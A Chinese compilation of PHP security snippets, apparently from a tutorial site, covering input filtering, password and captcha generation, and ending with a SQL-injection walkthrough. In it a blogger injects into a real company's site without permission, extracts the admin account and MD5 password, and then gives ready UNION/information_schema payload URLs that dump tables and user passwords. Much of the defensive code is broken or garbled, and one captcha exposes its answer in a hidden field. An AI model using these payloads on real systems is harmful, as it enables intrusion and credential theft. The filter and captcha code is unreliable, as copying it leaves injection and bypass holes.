在网站中表单提交或url获取值我们都可能碰到一些安全问题,下面我总结了一些常用的过滤一些危险特殊字符的解决方法,希望此教程对各位有帮助。
一般,对于传进来的字符,php可以用addslashes函数处理一遍(要get_magic_quotes_gpc()为假才处理,不然就重复转义了!),这样就能达到一定程度的安全要求
比如这样
代码如下 |
复制代码 |
if (!get_magic_quotes_gpc()) {
add_slashes($_GET);
add_slashes($_POST);
add_slashes($_COOKIE);
}
function add_slashes($string) {
if (is_array($string)) {
foreach ($string as $key => $value) {
$string[$key] = add_slashes($value);
}
} else {
$string = addslashes($string);
}
return $string;
}
|
但是还可以更进一步进行重新编码,解码,如下:
代码如下 |
复制代码 |
//编码
function htmlencode($str) {
if(empty($str)) return;
if($str=="") return $str;
$str=trim($str);
$str=str_replace("&","&",$str);
$str=str_replace(">",">",$str);
$str=str_replace("<","&lt;",$str);
$str=str_replace(chr(32),"&nbsp;",$str);
$str=str_replace(chr(9),"&nbsp;",$str);
$str=str_replace(chr(34),"&",$str);
$str=str_replace(chr(39),"&#39;",$str);
$str=str_replace(chr(13),"<br />",$str);
$str=str_replace("'","''",$str);
$str=str_replace("select","sel&#101;ct",$str);
$str=str_replace("join","jo&#105;n",$str);
$str=str_replace("union","un&#105;on",$str);
$str=str_replace("where","wh&#101;re",$str);
$str=str_replace("insert","ins&#101;rt",$str);
$str=str_replace("delete","del&#101;te",$str);
$str=str_replace("update","up&#100;ate",$str);
$str=str_replace("like","lik&#101;",$str);
$str=str_replace("drop","dro&#112;",$str);
$str=str_replace("create","cr&#101;ate",$str);
$str=str_replace("modify","mod&#105;fy",$str);
$str=str_replace("rename","ren&#097;me",$str);
$str=str_replace("alter","alt&#101;r",$str);
$str=str_replace("cast","ca&#115;",$str);
return $str;
}
|
这样就能更放心的对外来数据进行入库处理了, 但是从数据库取出来,在前台显示的时候,必须重新解码一下:
代码如下 |
复制代码 |
//解码
function htmldecode($str) {
if(empty($str)) return;
if($str=="") return $str;
$str=str_replace("sel&#101;ct","select",$str);
$str=str_replace("jo&#105;n","join",$str);
$str=str_replace("un&#105;on","union",$str);
$str=str_replace("wh&#101;re","where",$str);
$str=str_replace("ins&#101;rt","insert",$str);
$str=str_replace("del&#101;te","delete",$str);
$str=str_replace("up&#100;ate","update",$str);
$str=str_replace("lik&#101;","like",$str);
$str=str_replace("dro&#112;","drop",$str);
$str=str_replace("cr&#101;ate","create",$str);
$str=str_replace("mod&#105;fy","modify",$str);
$str=str_replace("ren&#097;me","rename",$str);
$str=str_replace("alt&#101;r","alter",$str);
$str=str_replace("ca&#115;","cast",$str);
$str=str_replace("&amp;","&",$str);
$str=str_replace("&gt;",">",$str);
$str=str_replace("&lt;","<",$str);
$str=str_replace("&nbsp;",chr(32),$str);
$str=str_replace("&nbsp;",chr(9),$str);
$str=str_replace("&",chr(34),$str);
$str=str_replace("&#39;",chr(39),$str);
$str=str_replace("<br />",chr(13),$str);
$str=str_replace("''","'",$str);
return $str;
}
|
虽然多了一步编码,解码的过程,但是安全方面,会更进一步,要如何做,自己取舍吧。
再附一些
代码如下 |
复制代码 |
function safe_replace($string) {
$string = str_replace(' ','',$string);
$string = str_replace(''','',$string);
$string = str_replace(''','',$string);
$string = str_replace('*','',$string);
$string = str_replace('"','"',$string);
$string = str_replace("'",'',$string);
$string = str_replace('"','',$string);
$string = str_replace(';','',$string);
$string = str_replace('<','<',$string);
$string = str_replace('>','>',$string);
$string = str_replace("{",'',$string);
$string = str_replace('}','',$string);
return $string;
}
|
更全面的
代码如下 |
复制代码 |
//处理提交的数据
function htmldecode($str) {
if (empty ( $str ) || "" == $str) {
return "";
}
$str = strip_tags ( $str );
$str = htmlspecialchars ( $str );
$str = nl2br ( $str );
$str = str_replace ( "?", "", $str );
$str = str_replace ( "*", "", $str );
$str = str_replace ( "!", "", $str );
$str = str_replace ( "~", "", $str );
$str = str_replace ( "$", "", $str );
$str = str_replace ( "%", "", $str );
$str = str_replace ( "^", "", $str );
$str = str_replace ( "^", "", $str );
$str = str_replace ( "select", "", $str );
$str = str_replace ( "join", "", $str );
$str = str_replace ( "union", "", $str );
$str = str_replace ( "where", "", $str );
$str = str_replace ( "insert", "", $str );
$str = str_replace ( "delete", "", $str );
$str = str_replace ( "update", "", $str );
$str = str_replace ( "like", "", $str );
$str = str_replace ( "drop", "", $str );
$str = str_replace ( "create", "", $str );
$str = str_replace ( "modify", "", $str );
$str = str_replace ( "rename", "", $str );
$str = str_replace ( "alter", "", $str );
$str = str_replace ( "cast", "", $str );
$farr = array ("//s+/", //过滤多余的空白
"/<(//?)(img|script|i?frame|style|html|body|title|link|meta|/?|/%)([^>]*?)>/isU", //过滤 <script 防止引入恶意内容或恶意代码,如果不需要插入flash等,还可以加入<object的过滤
"/(<[^>]*)on[a-zA-Z]+/s*=([^>]*>)/isU" )//过滤javascript的on事件
;
$tarr = array (" ", "", //如果要直接清除不安全的标签,这里可以留空
"" );
return $str;
}
|
php生成一个随机的密码,方便快捷,可以随机生成安全可靠的密码,希望此文章对大家会有所帮助。
例
代码如下 |
复制代码 |
<?php
header("Content-type:text/html;charset=utf-8");
function getRandPass($length = 6){
$password = '';
//将你想要的字符添加到下面字符串中,默认是数字0-9和26个英文字母
$chars = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
$char_len = strlen($chars);
for($i=0;$i<$length;$i++){
$loop = mt_rand(0, ($char_len-1));
//将这个字符串当作一个数组,随机取出一个字符,并循环拼接成你需要的位数
$password .= $chars[$loop];
}
return $password;
}
echo getRandPass(12); //随机生成一个12位数的密码
?>
|
生成密码哪下
![php快速生成一个随机的密码](/upload/news/201611/20131213060459820.jpg)
例2,与第一个有一点像
1、预置一个的字符串 $chars ,包括 a – z,A – Z,0 – 9,以及一些特殊字符
2、在 $chars 字符串中随机取一个字符
3、重复第二步 n 次,可得长度为 n 的密码
代码如下 |
复制代码 |
function generate_password( $length = 8 ) {
// 密码字符集,可任意添加你需要的字符
$chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_ []{}<>~`+=,.;:/?|';
$password = '';
for ( $i = 0; $i < $length; $i++ )
{
// 这里提供两种字符获取方式
// 第一种是使用 substr 截取$chars中的任意一位字符;
// 第二种是取字符数组 $chars 的任意元素
// $password .= substr($chars, mt_rand(0, strlen($chars) - 1), 1);
$password .= $chars[ mt_rand(0, strlen($chars) - 1) ];
}
return $password;
}
|
get_magic_quotes_gpc函数是一个用来判断是否为用户提供的数据增加斜线了,这个在php.ini配置文件中哦,下面我来介绍一下get_magic_quotes_gpc()函数说明.
get_magic_quotes_gpc函数介绍
取得 PHP 环境变数 magic_quotes_gpc 的值,属于 PHP 系统功能。
语法: long get_magic_quotes_gpc(void);
返回值: 长整数
本函数取得 PHP 环境配置的变量 magic_quotes_gpc (GPC, Get/Post/Cookie) 值。返回 0 表示关闭本功能;返回 1 表示本功能打开。
当 magic_quotes_gpc 打开时,所有的 ‘ (单引号), ” (双引号), (反斜线) and 空字符会自动转为含有反斜线的溢出字符。
magic_quotes_gpc设置是否自动为GPC(get,post,cookie)传来的数据中的’”加上反斜线。可以用get_magic_quotes_gpc()检测系统设置。
如果没有打开这项设置,可以使用addslashes()函数添加,它的功能就是给数据库查询语句等的需要在某些字符前加上了反斜线。
这些字符是单引号(’)、双引号(”)、反斜线()与 NUL(NULL 字符)。
默认情况下,PHP 指令 magic_quotes_gpc 为 on,它主要是对所有的 GET、POST 和 COOKIE 数据自动运行 addslashes()。
不要对已经被 magic_quotes_gpc 转义过的字符串使用 addslashes(),因为这样会导致双层转义。遇到这种情况时可以使用函数 get_magic_quotes_gpc() 进行检测。
例
利用 get_magic_quotes_gpc()预防数据库攻击的正确做法
代码如下 |
复制代码 |
<?php
function check_input($value)
{
// 去除斜杠
if (get_magic_quotes_gpc())
{
$value = stripslashes($value);
}
// 如果不是数字则加引号
if (!is_numeric($value))
{
$value = “‘” . mysql_real_escape_string($value) . “‘”;
}
return $value;
}
$con = mysql_connect(“localhost”, “hello”, “321″);
if (!$con)
{
die(‘Could not connect: ‘ . mysql_error());
}
// 进行安全的 SQL
$user = check_input($_POST['user']);
$pwd = check_input($_POST['pwd']);
$sql = “SELECT * FROM users WHERE
user=$user AND password=$pwd”;
mysql_query($sql);
mysql_close($con);
?>
|
总结如下:
1. 对于magic_quotes_gpc=on的情况,
我们可以不对输入和输出数据库的字符串数据作
addslashes()和stripslashes()的操作,数据也会正常显示。
如果此时你对输入的数据作了addslashes()处理,
那么在输出的时候就必须使用stripslashes()去掉多余的反斜杠。
2. 对于magic_quotes_gpc=off 的情况
必须使用addslashes()对输入数据进行处理,但并不需要使用stripslashes()格式化输出
因为addslashes()并未将反斜杠一起写入数据库,只是帮助mysql完成了sql语句的执行
验证码是一个现在WEB2.0中常见的一个功能了,像注册、登录又或者是留言页面,都需要注册码来验证当前操作者的合法性,我们会看到有些网站没有验证码,但那是更高级的验证了,下面我们来看常用的验证码生成与使用方法。
1 一个简单的验证码实例
1.1 显示验证码的图片
代码如下 |
复制代码 |
<?php
$num=intval(mt_rand(1000,9999));
for($i=0 ; $i<4 ;$i++)
{echo "<img" width=100% src=img/yzm/".substr(strval($num),$i,1).".gif/>";}
?>
|
1.2 验证过程
代码如下 |
复制代码 |
if (strval($inputyzm)!=strval($num))
{
echo "<script>alert('验证码错误!');history.go(-1);</script>";
exit;
}
|
2 一个汉字的验证码实例
2.1 显示验证码的图片
代码如下 |
复制代码 |
<?php
$str="汉","字","验","证","码"); //可以定义汉字的内容和个数
$word=strlen($str));
for ($i=0;$i<4;$i++)
{
$num=rand(0,$word);
$img = $img."<img" width=100% src='../images/yzm/".$num".gif'/>";
$pic = $pic.$str[$num];
}
> |
2.2 将生成的随机字符串赋给一个隐藏域
代码如下 |
复制代码 |
<input type="hidden" name="yzm" value="<?php echo $pic; ?/>"> |
2.3 定义一个check()函数
代码如下 |
复制代码 |
<script language="javascript">
function check(form)
{
if(form.yzm.value==""){
alert("请输入验证码");
form.yzm.focus();
return false;
}
if(form.yzm.vale!=form.yz.value)
{alert("验证码错误");
form.yzm.focus();
return false;
}
}
</script>
|
看一个完整的实例
php 验证码生成与调用的例子,平时开发中经常使用,记录一下。
1、验证码生成文件code.php
代码如下 |
复制代码 |
<?
Header("Content-type:image/png");
//定义header,声明图片文件,最好是png,无版权之扰;
//生成新的四位整数验证码
session_start();//开启session;
authnum_session = '';
str = 'abcdefghijkmnpqrstuvwxyz1234567890';
//定义用来显示在图片上的数字和字母;
l = strlen(str); //得到字串的长度;
//循环随机抽取四位前面定义的字母和数字;
for(i=1;i<=4;i++)
{
num=rand(0,l-1);
//每次随机抽取一位数字;从第一个字到该字串最大长度,
//减1是因为截取字符是从0开始起算;这样34字符任意都有可能排在其中;
authnum_session.= str[num];
//将通过数字得来的字符连起来一共是四位;
}
session_register("authnum_session");
//用session来做验证也不错;注册session,名称为authnum_session,
//其它页面只要包含了该图片
//即可以通过_SESSION["authnum_session"]来调用
//生成验证码图片,
srand((double)microtime()*1000000);
im = imagecreate(50,20);//图片宽与高;
//主要用到黑白灰三种色;
black = ImageColorAllocate(im, 0,0,0);
white = ImageColorAllocate(im, 255,255,255);
gray = ImageColorAllocate(im, 200,200,200);
//将四位整数验证码绘入图片
imagefill(im,68,30,gray);
//如不用干扰线,注释就行了;
li = ImageColorAllocate(im, 220,220,220);
for(i=0;i<3;i++)
{//加入3条干扰线;也可以不要;视情况而定,因为可能影响用户输入;
imageline(im,rand(0,30),rand(0,21),rand(20,40),rand(0,21),li);
}
//字符在图片的位置;
imagestring(im, 5, 8, 2, authnum_session, white);
for(i=0;i<90;i++)
{//加入干扰象素
imagesetpixel(im, rand()%70 , rand()%30 , gray);
}
ImagePNG(im);
ImageDestroy(im);
?>
|
以上代码,参考了如下的文章:
php图片验证码
php生成验证码的例子
用php生成带有雪花背景的验证码
2、调用验证码的页面 sessionValidate.php
代码如下 |
复制代码 |
<?php
session_start();
//在页首先要开启session,
//error_reporting(2047);
session_destroy();
//将session去掉,以每次都能取新的session值;
//用seesion 效果不错,也很方便
?>
<html>
<head>
<title>session 图片验证实例</title>
</head>
<body>
此例为session验证实例
<form action="" method="post">
验证码:<input type="text" name="validate" value="" size=10> <img" width=100% src="checkNum_session.php"><br>
<input type="submit">
</form>
<?php
//打印上一个session;
echo "上一个session:<b>"._SESSION["authnum_session"]."</b><br>";
validate="";
if(isset(_POST["validate"])){
validate=_POST["validate"];
echo "您刚才输入的是:"._POST["validate"]."<br>状态:";
if(validate!=_SESSION["authnum_session"]){
//判断session值与用户输入的验证码是否一致;
echo "<font color=red>输入有误</font>";
}else{
echo "<font color=green>通过验证</font>";
}
}
/*
//打印全部session;
PrintArr(_SESSION);
function PrintArr(aArray){
echo '<xmp>';
print_r(aArray);
echo '</xmp>';
}
*/
?>
|
SQL注入就是利用你语法或接受数据处理上的一些bug进行爆数据库,然后下载你的数据或直接获取你的管理员进入一些对网站有影响的操作,但在SQL注入中我们有那些bug给人利用呢,下面小编收集了一些初级与稍高级一点的方法,只共学习参考使用,其它一律不管。
最基本的sql注入漏洞方法
今天早上学院开了个会,说了些关于毕业实习与设计的安排之类的还有说明天有个企业来招聘,让有兴趣的人回去登录他们公司的网站看看。paperen我当然是没有这个兴趣的啦,但是宿舍的小华同学就有点兴趣,回来就上了他们的网站。但是……?
paperen我也瞅了几眼,网站不咋的啊,asp的,也不知道为啥突然想也去踩踩,看看有没有存在sql注入漏洞,登上他们的网站,看了几个页面,去到公司新闻那,有一条新闻url是xwzx_content.asp?id=456(很正常的传值,根据id值去查数据库并显示相应的数据,也很合理),但是……?
paperen我将参数改为xwzx_content.asp?id=456 and 1=1试了试,发现与id=456显示是一样的。(并不能证明是否存在漏洞)?
然后又试试这个
代码如下 |
复制代码 |
xwzx_content.asp?id=456 and '1'='1 |
结果是
![](/upload/news/201611/20131130102503.jpg)
提示错误由此可以判断出存在漏洞,因为你可以在自己的数据库随便找个表来试试这个语句?
select * from table where id=1 and 1=1(某一条记录的id号),其实加上and 1=1与不加是一样的结果,因为1=1是true的,sql肯定可以执行过去,但如果你是1=2的话就不行了,因为很显然1不等于2,为false所以查不到任何数据。?
然后继续去构造语句xwzx_content.asp?id=456 or 1=1,结果是
![](/upload/news/201611/20131130102525.jpg)
得出这个结果也是很显然的,因为or上一个1=1(ture)结果也是true的,无论你的id号为456这条数据是否存在都会查出所有数据记录。?
从上面几个操作就证实了sql注入漏洞确实在这个页面存在,下面开始正式的注入爆出我们想得到的信息,主要是看你的RP。?
![](/upload/news/201611/20131130102543.jpg)
我们需要使用union联合查询出其管理密码与账号。当然前提是你要去猜出管理员那个表的名字。?
paperen我第一个想到的就是管理员,试试吧。
1.xwzx_content.asp?id=456?union select?* from 管理员结果是
![](/upload/news/201611/20131130102554.jpg)
提示字段数不匹配,那么我们再去猜它的字段数吧
1.xwzx_content.asp?id=456?union select?1,2,3,4,5,6 from 管理员结果是
![](/upload/news/201611/20131130102627.jpg)
看来是猜对了,这个表中共有10个字段,其中4这个字段会被显示到页面中。可能大家不太明白这里到底是什么回事,paperen我不妨放出一个自己在mysql中的一个截图。
1.sql命令是SELECT * FROM `paper_blog` WHERE id =1 UNION SELECT 1 , 2, 3, 4, 5, 6, 7, 8, 9, 10 FROM member
?
看到第二行的1,2,3,4,5了吧,反正自己领会领会吧,关于union这个联合查询不知道大家有没有用过,简单地说就是将别的表的数据都查询过来。?
再来猜他放管理员账号那个字段名,我就猜是name吧。
1.xwzx_content.asp?id=456?union select?1,2,3,name,5,6 from 管理员结果是
这就证明猜错了,继续猜叫管理员,嘻嘻,果然有了。
![](/upload/news/201611/20131130102713.jpg)
爆出管理员的账号是管理员,再来爆他的密码,就猜叫password吧。
1.xwzx_content.asp?id=456?union select?1,2,3,password,5,6 from 管理员结果是
![](/upload/news/201611/20131130102725.jpg)
密码是32位的,应该是MD5加密的,ctrl+c一下到一些在线解MD5的网站一查,密码竟然也是管理员……这安全意识也太差了吧。?
账号有了密码也有了,还差什么?很明显是后台地址,但是paperen我还是找不到啊,蒙不对地址,看到这里不知道大家是不是有些少失望,唉,paperen我也有点,但是算了,我还要发表博文呢,先不花时间去碰了。反正这个网站给我的印象就是不太好,公司估计也不咋的吧。?
其实要入侵一个网站真的不是很容易的,要防入侵也是很不容易的,但是从上面说的这些可以看出某些观点去防止出现这种很低级的错误。?
1.对get传参的参数进行过滤与判断
2.不要参照某些开源的程序的数据库表或表名去建立自己的数据库
3.要使用比较复杂的密码,至少不要管理员,管理员888之类的
4.放后台文件的文件夹名字最好改得特别点,不要让人轻易猜到
5.对于asp网站的数据库文件最好改后缀为asp的,防止被下载?
稍微高级一点的SQL注入
还记得在“你是这样处理来自$_GET的数据吗 ”里面写到的那个SQL,
代码如下 |
复制代码 |
1.$sql = 'select * from goods where id='.$id; |
不对传入来的数据进行任何过滤甚至不用单引号抱起来会导致的问题在那篇文章中已经说的比较明确了,如果您能猜到数据库其他表的话还能查到其他表的内容,而这次paperen想说一些使用这个漏洞更高级的一个技巧。
假如你已经证实了此处存在漏洞,(怎样证明?简单来说分别测试一下将参数改为id=1=1与id=1=2再看页面就能知道是否存在漏洞,如果显示信息不一样或出错则证明存在漏洞),但是即使证实了有漏洞但猜不到其他表的表名怎办。使用一个很邪恶的招数,先放出注入URL。
爆出目前数据库名
1.URL:
代码如下 |
复制代码 |
http://localhost/mytest/sqlinject/?id=-1+UNION+select+1,2,3,database(),5,6,7,8,9+from+information_schema.columns2.SQL:SELECT * FROM goods WHERE id=-1 UNION SELECT 1,2,3,DATABASE(),5,6,7,8,9 FROM information_schema.columns |
然后将获得数据库test的hex值后再爆出该test数据库中的表名(获得test的hex值 select hex('test') 放到mysql中跑一下就可以看到结果了,74657374前面再加上0x,十六进制数)
1.URL:
代码如下 |
复制代码 |
http://localhost/mytest/sqlinject/?id=-1+UNION+SELECT+1,2,3,GROUP_CONCAT(DISTINCT(table_name)),5,6,7,8,9+FROM+information_schema.columns+AS+c+WHERE+c.table_schema=0x746573742.SQL:SELECT * FROM test.goods WHERE id = -1 UNION SELECT 1 , 2, 3, GROUP_CONCAT( DISTINCT table_name ) , 5, 6, 7, 8, 9 FROM information_schema.columns AS c WHERE c.table_schema = 0x74657374 |
然后在将表user的hex值放入去,查user表的字段,现在是DISTINCT(column_name)了,最好加上and如果有不止一个数据库有user表的话可能得出的结果会误导你。
1.URL:
代码如下 |
复制代码 |
http://localhost/mytest/sqlinject/?id=-1+UNION+SELECT+1,2,3,GROUP_CONCAT(DISTINCT(column_name)),5,6,7,8,9+FROM+information_schema.columns+WHERE+table_name=0x75736572+AND+TABLE_SCHEMA=0x746573742.SQL:select * from goods where id=-1 UNION SELECT 1,2,3,GROUP_CONCAT(DISTINCT(column_name)),5,6,7,8,9 FROM information_schema.columns WHERE table_name=0x75736572 AND TABLE_SCHEMA=0x74657374 |
you see!已经一步步地获得了我们想要的信息了,是不是有点意思呢?所以paperen说这种东西搞上来会上瘾的。
然后直接爆出他的user表的明码。
代码如下 |
复制代码 |
URL:http://localhost/mytest/sqlinject/?id=-1+UNION+SELECT+1,password,3,username,5,6,7,8,9+FROM+user2.SQL:select * from goods where id=-1 UNION SELECT 1,password,3,username,5,6,7,8,9 FROM user
|
但是user表里面可能不止一个用户数据,那么就加上limit吧
代码如下 |
复制代码 |
1.URL:http://localhost/mytest/sqlinject/?id=-1+UNION+SELECT+1,password,3,username,5,6,7,8,9+FROM+user+limit+1,12.SQL:select * from goods where id=-1 UNION SELECT 1,password,3,username,5,6,7,8,9 FROM user limit 1,1 |
然后将获得的密码拿去
破解获得明码,再知道后台路径,使用用户帐号与破解的密码登陆到后台吧,但是paperen后面两个步骤也是看你人品的,如果密码被搞得比较复杂,你也很难破解,即使你破解了也得要找到后台地址。So……就到此为止了。就是娱乐一下。(PS:你还可以用load_file将服务器一些文件内容弄到,前提是你也要猜到文件的路径)
标签:[!--infotagslink--]